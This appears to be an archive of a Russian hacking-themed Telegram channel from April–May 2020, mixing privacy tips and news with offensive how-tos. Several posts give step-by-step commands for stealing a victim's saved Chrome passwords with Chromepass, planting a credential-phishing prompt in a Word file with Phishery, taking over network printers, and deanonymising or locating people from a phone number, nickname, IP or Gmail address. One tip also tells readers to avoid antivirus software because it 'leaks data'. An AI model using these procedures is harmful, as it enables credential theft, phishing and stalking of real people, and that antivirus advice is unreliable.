Size: a a a

Эксплойт

2020 April 26
Эксплойт
​​​​Скрываем секретные данные внутри изображения или аудио

Стеганография представляет собой искусство сокрытия информации прямо на виду. Проще говоря, передача секретной инфы при помощи картинок с котиками.

Steghide - консольная утилита позволяющая скрывать информацию методом стеганографии в графических или аудио файлах. Рассмотрим как его использовать:

| apt-get install steghide

Зашифровка файла:
| steghide embed -cf файл В КОТОРЫЙ шифруем -ef файл КОТОРЫЙ шифруем

Вводим пароль и подтверждение. Все готово!
Для просмотра информации о зашифрованном файле:

| steghide info ЗАШИФРОВАННЫЙ файл

#криптография
источник
2020 April 27
Эксплойт
​​Набор утилит для деанонимизации в Termux

1. Скачиваем репозиторий:
git clone https://github.com/termux-lab/sherlock.git
2. Открываем директорию:
cd sherlock
3. Запускаем файл:
python3 install.py hello

После всех проделанных действий, у вас запускается программа, в которой множество функций, таких как: проверка по номеру телефона, по нику, IP адресу и другие.

Чтобы в последующем запускать утилиту, необходимо будет открыть ее папку и запустить одной буквой:
cd sherlock
s


#OSINT #termux
источник
Эксплойт
​​Чек-лист по анонимности в сети

Нет 100% безопасности и анонимности, если кому то очень понадобится до вас докопаться и для этого будут деньги и связи, то рано или поздно вас вычислят.

Но достаточно соблюдать эти простые меры безопасности, чтобы избавить себя от большинства проблем:

— Зашифруйте данные на носителях.
— Зашифруйте трафик через свой VPN.
— Используйте Google или Cloudflare DNS.
— Используйте VPS или виртуальную операционную систему при открытии подозрительных файлов и ссылок.
— Используйте Portable версии ПО.
— Чистите остаточные данные. Например, при помощи CCleaner Portable.
— Не используйте антивирусы. В 95% случаев, они сливают данные.
— Установите пароль на BIOS.
— Не используйте личные данные в социальных сетях: почта, фото, адрес, ФИО.
— Используйте левую сим-карту.
— Используйте разные пароли на сайтах.
— Используйте разные никнеймы.
— Не используйте WhatsApp и Viber.
— Для хранения паролей и логинов используйте менеджер.

Список будет пополняться, присылайте свои советы по анонимности нам в @exqbot.

#анонимность
источник
2020 April 28
Эксплойт
​​CSI Linux — дистрибутив для кибер-расследований и OSINT

В начале этого года вышел в свет очередной линукс-дистрибутив для проведения кибер-расследований и OSINT под именем CSI Linux Investigator.

В данном дистрибутиве есть разделение виртуальных машин на три составляющие — непосредственно дистрибутив, шлюз TOR и SIEM-сборку. Также содержит программное обеспечение, необходимое для решения следующих задач: OSINT, Digital Forensics, Incident Response, Malware Analysis.

С точки зрения наполнения сборки софтом — с одной стороны есть все необходимое, с другой стороны — много лишнего программного обеспечения, которое пагубно влияет на размер дистрибутива.

Загрузить дистрибутив можно по ссылке с официального сайта https://csilinux.com/. Там же размещены обзорные гайды и мануалы по работе с дистрибутивом.

#OSINT
источник
2020 April 29
Эксплойт
Как удаленно получить доступ к сохраненным паролям Chrome

Google Chrome используют 86% пользователей интернета. В нем хранится очень много полезной инфы о каждом пользователе.

Chromepass - это консольное приложение на Python, которое умеет добывать сохраненные пароли в Chrome. Требуется Python 3.6+.

Итак, в терминале:
$ cd chromepass
$ pip install -r requirements.txt
$ python -m pip install --upgrade pip
$ python -m pip install -r requirements.txt
$ python create_server.py

Далее, выберите метод client.exe, введите свой IP. Включите сообщение об ошибке если нужно, и добавьте свое сообщение при необходимости.

Теперь подождите, пока исполняемые файлы будут готовы. Запустите client.exe. Файл server_ip.exe — должна получить жертва. После этого, в client.exe начинают появляться пароли, как показано на скрине.

#хакинг
источник
Эксплойт
​​По России прошел ряд цифровых митингов

Пользователи Рунета в нескольких городах России устроили в "Яндекс.Картах" спонтанные массовые акции протеста, которые уже стали разгонять. Цифровые граждане пикетируют правительственные здания комментариями с различными лозунгами в «Яндекс.Картах».

Жители Ростова-на-Дону организовали виртуальный митинг в протест местным властям из-за режима самоизоляции. В приложении «Яндекс.Навигатор» у здания правительства области появились десятки комментариев с требованием ввести чрезвычайное положение или выплатить пособия. Кроме Ростова, «митинги на удалёнке»  состоялась также в Москве и Красноярске, а вот в Екатеринбурге пикет «разогнали» - Яндекс удалил все лишние реплики.

«Чем платить ипотеку?», «хотим есть, что делать?», «дайте возможность работать» — такие комментарии оставляли пользователи «Яндекс.Навигатора».

#новость
источник
2020 April 30
Эксплойт
​​​​Как ''пробить'' по IP адресу с помощью Termux

1. Скачиваем репозиторий:
git clone https://github.com/maldevel/IPGeoLocation
2. Открываем директорию:
cd IPGeoLocation
3. Добавляем разрешение файлу:
chmod +x *
4. Устанавливаем требования:
pip install -r requirements.txt
5. Запускаем программу:
python ipgeolocation.py -t [IP адрес]

После ввода IP, мы получаем такую информацию как: Город, страна, широту - долготу,  провайдер интернета, почтовый индекс и многое другое.

#OSINT #termux
источник
2020 May 01
Эксплойт
​​Отправляем зашифрованные электронные письма с помощью Mailvelope

К сожалению, отправка писем через электронную почту в наше время небезопасна, а почтовые провайдеры не спешат реализовать функцию шифрования писем.

Удобное расширение Mailvelope для провайдеров электронной почты: Gmail, Yahoo и других обеспечивает шифрование писем на основе PGP. Оно позволяет отправлять зашифрованные письма, которые не сможет прочитать никто, кроме вас и получателя. Вам просто нужно зашифровать электронное письмо паролем и сообщить его получателю.

Шифрование происходит на стороне клиента, поэтому даже разработчики расширения не могут получить доступ к сообщениям. Расширение использует в работе JavaScript-реализацию стандарта OpenPGP, а исходный код программы открыт.

Mailvelope: Chrome | Firefox

#безопасность
источник
2020 May 02
Эксплойт
​​Восьмилетняя девочка обошла родительский контроль на iPhone

Функция iOS под названием Screen Time призвана упростить жизнь родителям и дать им больше контроля над тем, что их ребенок делает с телефоном. В частности, она позволяет ограничивать или вовсе отключать на устройстве некоторые приложения.

По словам пользователя Reddit, его сестра воспользовалась iMessage App Store, чтобы получить доступ к приложениям, заблокированным через Screen Time.  

Сам «хак» очень прост. Пользователь должен открыть iMessage, чтобы написать новое сообщение, а затем открыть iMessage App Store с панели управления. В iMessage App Store нужно ввести в поиск требуемое приложения (в случае девочки это был YouTube) и нажать на «Открыть». Приложение откроется как ни в чем не бывало, даже если оно было заблокировано с помощью Screen Time.

#новость
источник
Эксплойт
​​Как взломать принтер в локальной сети

Для того, чтобы перехватить управление беспроводным принтером, нам понадобиться подключиться к WiFi сети, в которой работает этот принтер. Данная утилита работает как на Kali linux, так и на Termux.

Установка:

apt update & apt upgrade
pip2 install colorama
git clone https://github.com/RUB-NDS/PRET
cd PRET
pip install colorama pysnmP

Далее, нам нужно будет узнать IP адрес нашего принтера, сделать это можно в настройках принтера или через программу WiFi Analyzer. Это приложение сканирует WiFi сеть и показывает, локальные IP устройств, которые к ней подключены.

Запускаем программу:
python2 pret.py (IP принтера) pjl

Если подключение успешно, то вам будет доступен ввод различных команд для управления принтером.  Командой help можно посмотреть все доступные функции, среди которых: печать произвольного текста или файла, отображение текста на дисплее принтера, флуд печатью и многое другое.

#хакинг #IoT
источник
2020 May 03
Эксплойт
​​Скачиваем все фото с инстаграм аккаунта с помощью Termux

Очень полезная программа, которая позволяет скачать сразу все фото из инстаграм аккаунта. По понятным причинам работает только для публичных аккаунтов.

1. Скачиваем нужные пакеты
apt update && apt upgrade && pkg install python
2. Скачиваем программу
pip install instaloader
3. Запускаем программу
instaloader profile имя_пользователя

Чтобы посмотреть скачанные фото, перекинем их в корневую директорию устройства.
cp -r имя_пользователя /sdcard

#termux
источник
2020 May 04
Эксплойт
​​​​Получаем открытую информацию о сайте или IP-адресе

Главной ценностью информации является её оперативность и теперь вам не нужно открывать браузер, чтобы получить информацию о необходимом сайте или IP-адресе.

С помощью бота @whoisdombot можно узнать основную whois-информацию для доменного имени и IP-адреса, среди которой:

— Дата регистрации домена;
— Контактная информация владельца;
— Информация о доменном регистраторе;
— Дата окончания регистрации домена.

Также можно отправить боту IP адрес, например компьютера и узнать информацию о его провайдере и местонахождении с точностью до города.

#OSINT #telegram
источник
2020 May 05
Эксплойт
​​Как браузер может идентифицировать пользователя

Цифровой отпечаток устройства - это невероятно точный метод выявления уникальных браузеров и отслеживания онлайн-активности. Веб-сайты используют его для для сбора информации о типе и версии браузера, а также о вашей операционной системе, активных плагинах, часовом поясе, языке, разрешении экрана и других активных настройках.

Поначалу эти данные могут показаться общими и не помогут в идентификации одного конкретного человека. Тем не менее, вероятность того, что цифровой отпечаток у другого пользователя информация будет совпадать на 100%, весьма мала.  Только 1 из 286 777 других браузеров будет иметь тот же отпечаток, что и вы.

Сайт https://amiunique.org  поможет вам понять, на сколько уникален ваш цифровой отпечаток и какие параметры выдают вас среди других пользователей.

#анонимность
источник
Эксплойт
​​Как запутать своего интернет-провайдера через Termux

Всем давно известно, что провайдеры ведут логи и собирают информацию о том, какие сайты мы посещаем и когда мы это делаем.

Эта программа будет  делать множество запрос в день на различные сайты с вашего IP, что может запутать провайдера, который пристально следит за вами.

1. Скачиваем нужные пакеты:
apt update && apt upgrade -y && apt install python git -y
2. Скачиваем зависимости:
pip install requests
3. Скачиваем репозиторий:
git clone https://github.com/1tayH/noisy.git
4. Открываем директорию:
cd noisy
5. Запускаем файл:
python noisy.py --config config.json

Опцианальные аргументы:
 --log -l -> Настройка уровеня регистрации
 --config -c  -> Кастомный config файл
 --timeout -t  -> Время работаты сканера (в секундах)

#анонимность #termux
источник
2020 May 06
Эксплойт
​​Кража ваших SMS сообщений с помощью 0day уязвимости в iOS

Недавно пользователь твиттра s1guza нашел уязвимость нулевого дня в новейшей, не бета-версии iOS (13.4.1), которая позволяет написать вредоносное приложение для кражи истории сообщений iMessage.

Для воспроизведения уязвимости нужно создать вредоносное приложение, которое загружает файл sms.db и отправляет на сервер, подписать его и установить на устройство. Далее включить принимающий сервер и как только приложение будет запущено, на сервере появится база данных.

Этот баг был исправлен в бета-версии iOS 13.5, однако для обновления эта версия еще не доступна, поэтому не устанавливайте подозрительные приложения, пока Apple не выпустит обновление.

#новость
источник
2020 May 07
Эксплойт
​​Как получить местонахождение человека, использующего Gmail

Пользователи Google нередко оставляют отзывы о заведениях, которые посещают. Однако, они иногда не подозревают, что имея на руках адрес электронной почты можно с легкостью узнать, какие отзывы и где человек оставлял. А исходя из этого, понять его примерное местонахождение.

1. Заходим на contacts.google.com и добавляем E-Mail в контакты.
2. Наводим на меленькую фотографию контакта в левом нижнем углу появившегося окошка и заходим в код элемента.
3. Находим строчку  <div class="NVFbjd LAORIe " data-sourceid="115978902187173497207"> и копируем числовое значение - это GoogleID
4. Вставляем его вместо <GoogleID> в ссылку  https://www.google.com/maps/contrib/<GoogleID> и переходим по ней.

Если человек когда либо оставлял отзывы, вы увидите, где и когда это было, и что он писал.
источник
2020 May 08
Эксплойт
​​Хакеры воровали данные через вредоносный код в иконках сайтов

Недавно аналитики выявили новую серию странных взломов интернет-магазинов, единственной целью которых была подмена иконок (favicon) на взломанных сайтах. Новые favicon представляли собой файлы изображений, размещенные на неком сайте MyIcons, и не содержали вредоносного кода. Хитрость заключалась в том, что сайт MyIcons предоставлял легитимный файл favicon для всех страниц атакованного ресурса, кроме тех, где размещались формы оформления заказа.

На страницах оформления заказа MyIcons подменял обычный favicon вредоносным файлом JavaScript, который создавал поддельную форму оплаты и воровал введенные в нее данные карты пользователя.

Владельцы сайтов, заметившие обращения к MyIcons, обнаружили бы безвредный портал для хостинга favicon. Однако на самом деле данный сайт выступал клоном легитимного портала IconArchive.com и служил обычной ширмой для проведения атак.

#новость
источник
Эксплойт
​​Откажитесь от автоподключения к Wi-Fi

В iPhone есть удобная функция, позволяющая автоматически подключаться к знакомым Wi-Fi-сетям. Как только смартфон видит знакомую сеть, он тут же пытается подключиться к ней, не спрашивая разрешения у пользователя. С одной стороны, это удобно. С другой стороны, никто не мешает злоумышленнику настроить свою, поддельную Wi-Fi-сеть и замаскировать ее под известный публичный хотспот, дав ей то же имя.

В результате вы можете даже не заметить, что пользуетесь Интернетом не через сотовую сеть, а через Wi-Fi, в то время как ваши данные уже потекут к хакеру на сервер. Тщательно проверяйте, к каким сетям вы подключаетесь, предварительно заставив iPhone «забыть» знакомые сети и включив подтверждение подключения к Wi-Fi, что значительно снизит риск незаметно подключиться к потенциально опасной Wi-Fi-сети.

Зайдите в «Настройки» –> «Wi-Fi» –> Выбрать нужную беспроводную сеть –> «Забыть эту сеть» –> «Вернуться в Wi-Fi» –> «Подтверждать подключение: вкл.».

#безопасность #iPhone
источник
2020 May 09
Эксплойт
​​Как получить учетные данные пользователя через Microsoft Word

Phishery встраивает в существующий документ Microsoft Word появляющееся окно с требованием ввести имя пользователя и пароль.

Установка в Kali Linux:
$ apt-get install phishery
$ mkdir phishery
$ tar -xvf phishery.tar.gz --strip=1 -C ./phishery
cd phishery

Открываем файл настроек (settings.json), в настройках нам нужно указать:
port — порт, на котором будет работать сервер.

После настройки phishery, загружаем на сервер файл в формате docx, в который мы встроим фишинговый код:
./phishery -u https://example.com/docs -i zarplata.docx -o zarplata_phish.docx

Запускаем сервер, для получения и сохранения аутентификационных данных:
$ ./phishery -s settings.json -c credentials.json

Теперь отправляем файл жертве и ждем открытия. При открытии файла, поверх MS Word появится окно запроса имени и пароля. При вводе любых данных и нажатии OK, мы получим эти данные и они отобразятся в логах и запишутся в файл credentials.json.
источник
2020 May 10
Эксплойт
​​P2P чат в Termux

Как вы знаете, все сообщения, что вы отправляете в сети проходят через централизованный сервер, что не безопасно по целому ряду очевидных причин. Сегодня, я расскажу вам, как общаться в одноранговой сети (P2P) используя NetCat.

Для того, чтоб протестировать эту сеть 2 устройства не понадобится, можно использовать 2 вкладки в Termux.

1-ое устройство
1. Скачиваем NetCat
$ pkg install netcat
2. Узнаем свой IP
$ ifconfig
3. Открываем порт на прослушку (абсолютно любые 5 цифр)
$ nc -l -p 56789

2-ое устройство
1. Также скачиваем NetCat
$ pkg install netcat
2. Подключаемся к первому устройству используя ip и порт
$ nc IP 56789

#безопасность #termux
источник